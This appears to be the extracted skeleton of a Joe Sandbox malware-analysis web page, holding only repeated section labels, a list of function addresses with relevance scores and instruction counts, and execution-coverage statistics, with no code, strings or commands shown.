Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02276F4D Relevance: .0, Instructions: 3COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054FF9F Relevance: 69.3, APIs: 46, Instructions: 301COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C5B5 Relevance: 19.6, APIs: 13, Instructions: 74COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C40E Relevance: 12.0, APIs: 8, Instructions: 48COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C087 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0057D330 Relevance: 9.1, APIs: 6, Instructions: 66COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C182 Relevance: 9.0, APIs: 6, Instructions: 34COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0057D41B Relevance: 7.6, APIs: 5, Instructions: 86COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054F50E Relevance: 7.6, APIs: 5, Instructions: 63COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0057D250 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054AE7C Relevance: 7.5, APIs: 5, Instructions: 33COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0057D0E2 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C4C4 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 8.4% |
Dynamic/Decrypted Code Coverage: | 81.3% |
Signature Coverage: | 0% |
Total number of Nodes: | 107 |
Total number of Limit Nodes: | 9 |
Graph
Function 068C1018 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAAA32 Relevance: 4.0, Strings: 1, Instructions: 2738COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068C5D50 Relevance: 3.0, Strings: 2, Instructions: 487COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068CE0D9 Relevance: 2.8, Strings: 2, Instructions: 337COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EADBE0 Relevance: 2.3, Instructions: 2305COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068C3560 Relevance: 1.9, Strings: 1, Instructions: 604COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068C02F8 Relevance: 1.0, Instructions: 1019COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068C45C0 Relevance: .8, Instructions: 818COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068CA150 Relevance: .6, Instructions: 645COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068C91F8 Relevance: .6, Instructions: 579COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA4AA0 Relevance: .3, Instructions: 266COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA3E88 Relevance: .2, Instructions: 238COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06A1D490 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068CE571 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06A1A464 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06A1E46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068CE658 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA6EF8 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA7D98 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA7DA8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA6BC0 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA6BB0 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA8FB8 Relevance: .9, Instructions: 940COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA8FC8 Relevance: .9, Instructions: 934COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA86C0 Relevance: .6, Instructions: 611COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA4A96 Relevance: .3, Instructions: 259COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA1C2 Relevance: .3, Instructions: 251COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA3E7E Relevance: .2, Instructions: 234COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA6D8 Relevance: .2, Instructions: 213COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA4818 Relevance: .2, Instructions: 180COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA480C Relevance: .2, Instructions: 179COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA510 Relevance: .1, Instructions: 144COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA6764 Relevance: .1, Instructions: 135COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA677C Relevance: .1, Instructions: 134COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA6CEE Relevance: .1, Instructions: 134COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1108 Relevance: .1, Instructions: 133COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA502 Relevance: .1, Instructions: 121COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1138 Relevance: .1, Instructions: 112COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA26E4 Relevance: .1, Instructions: 93COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA26F0 Relevance: .1, Instructions: 90COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA080 Relevance: .1, Instructions: 82COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA090 Relevance: .1, Instructions: 78COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA9F80 Relevance: .1, Instructions: 77COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA16A8 Relevance: .1, Instructions: 76COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1382 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1880 Relevance: .1, Instructions: 73COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA4F90 Relevance: .1, Instructions: 73COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013BD030 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1890 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA9F90 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA16B8 Relevance: .1, Instructions: 69COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA4FA0 Relevance: .1, Instructions: 68COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1390 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA17C8 Relevance: .1, Instructions: 65COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA0848 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA0838 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1492 Relevance: .1, Instructions: 61COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA17D8 Relevance: .1, Instructions: 54COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA14A0 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013BD02B Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA6CA Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA8F20 Relevance: .0, Instructions: 39COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA7EC0 Relevance: .0, Instructions: 34COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA8F30 Relevance: .0, Instructions: 33COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068C5670 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068CC370 Relevance: 4.3, Strings: 3, Instructions: 576COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068C3CAB Relevance: 2.9, Strings: 2, Instructions: 421COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA41D0 Relevance: .3, Instructions: 281COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06A1A198 Relevance: .3, Instructions: 264COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|